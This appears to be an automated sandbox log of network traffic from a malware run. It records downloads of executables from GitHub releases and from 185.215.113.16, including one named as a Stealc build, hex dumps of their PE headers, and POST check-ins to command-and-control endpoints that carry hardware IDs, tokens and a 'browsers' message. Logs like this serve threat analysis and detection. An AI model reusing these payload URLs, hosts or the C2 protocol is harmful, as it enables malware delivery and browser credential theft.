                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 03 Jan 2025 08:50:47 GMTContent-Type: application/octet-streamContent-Length: 3277824Last-Modified: Fri, 03 Jan 2025 08:35:47 GMTConnection: keep-aliveETag: "6777a163-320400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 10 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 32 00 00 04 00 00 22 02 33 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc ef 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c ef 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d4 05 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 73 72 71 6f 78 62 76 00 50 2b 00 00 b0 06 00 00 46 2b 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 72 72 62 63 6c 64 6f 00 10 00 00 00 00 32 00 00 06 00 00 00 dc 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 32 00 00 22 00 00 00 e2 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 03 Jan 2025 08:50:53 GMTContent-Type: application/octet-streamContent-Length: 1960448Last-Modified: Fri, 03 Jan 2025 08:45:30 GMTConnection: keep-aliveETag: "6777a3aa-1dea00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 3e 01 00 00 00 00 00 00 b0 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 86 00 00 04 00 00 bc 9a 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b 80 41 00 6f 00 00 00 00 d0 40 00 9c ad 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 26 86 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 40 00 00 10 00 00 00 4e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c ad 00 00 00 d0 40 00 00 70 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 41 00 00 02 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 90 41 00 00 02 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 77 63 78 6d 75 79 69 00 00 1b 00 00 a0 6b 00 00 f2 1a 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 63 67 61 67 64 6c 73 00 10 00 00 00 a0 86 00 00 04 00 00 00 c4 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 86 00 00 22 00 00 00 c8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 08:50:53 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 03 Jan 2025 08:50:57 GMTContent-Type: application/octet-streamContent-Length: 4494336Last-Modified: Fri, 03 Jan 2025 08:49:17 GMTConnection: keep-aliveETag: "6777a48d-449400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c4 35 72 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 8c 4d 00 00 82 77 00 00 32 00 00 00 50 ca 00 00 10 00 00 00 a0 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 ca 00 00 04 00 00 c0 4b 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f c0 74 00 73 00 00 00 00 b0 74 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 82 77 00 88 06 00 00 a8 32 ca 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 32 ca 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 a0 74 00 00 10 00 00 00 90 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 b0 74 00 00 02 00 00 00 a0 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 c0 74 00 00 02 00 00 00 a2 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 39 00 00 d0 74 00 00 02 00 00 00 a4 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 6e 73 79 67 69 6d 62 00 d0 1b 00 00 70 ae 00 00 c6 1b 00 00 a6 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 64 75 79 77 78 74 78 00 10 00 00 00 40 ca 00 00 06 00 00 00 6c 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 ca 00 00 22 00 00 00 72 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 08:51:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: GET /legendary6911331/gold/releases/download/ggggg/gold1111111111.exe HTTP/1.1Host: github.com
                                  Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/910997785/34bbe59b-8804-485f-bec3-be8f21681382?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085015Z&X-Amz-Expires=300&X-Amz-Signature=95284105c340b388ec84ffb84562274149d126ddb76b6dfe4032a6b569caa23b&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dgold1111111111.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /legendary6911331/zakaz2/releases/download/zakaz2/liddad.exe HTTP/1.1Host: github.com
                                  Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/910998942/245e975e-0c8d-48e8-a6d9-d07e7e1e6c8a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085020Z&X-Amz-Expires=300&X-Amz-Signature=529769effe37e35e131f5039b89fb420ef6d2600ba248f0f6cc794883bc50b20&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dliddad.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                                  Source: global trafficHTTP traffic detected: GET /legendary6911331/zakaz5/releases/download/zakaz5/client_jackbastadguy.exe HTTP/1.1Host: github.com
                                  Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/911427352/1d7d7595-2252-461b-958f-e8d3372f48f6?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085029Z&X-Amz-Expires=300&X-Amz-Signature=af07bd313c5d406f418a7c1daa9345e61385b33bd2c090d2cc1c6805f8d1a897&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dclient_jackbastadguy.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                  Source: global trafficHTTP traffic detected: GET /inc/legs.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 35 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001527001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: GET /test/am209.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 38 39 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004899001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: GET /inc/stealc_valenciga.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 135.181.65.216Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 36 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008659001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHJJEHIEBKKFIDHDGHJHost: 135.181.65.216Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 35 35 37 36 44 46 41 33 34 34 32 34 30 39 36 35 37 32 39 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 76 61 6c 65 6e 63 69 67 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 2d 2d 0d 0a Data Ascii: ------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="hwid"8E5576DFA3442409657292------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="build"valenciga------AFHJJEHIEBKKFIDHDGHJ--
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCAHost: 135.181.65.216Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="message"browsers------DHDHCGHDHIDHCBGCBGCA--
                                  Source: global trafficHTTP traffic detected: GET /inc/gold123.exe HTTP/1.1Host: 185.215.113.16
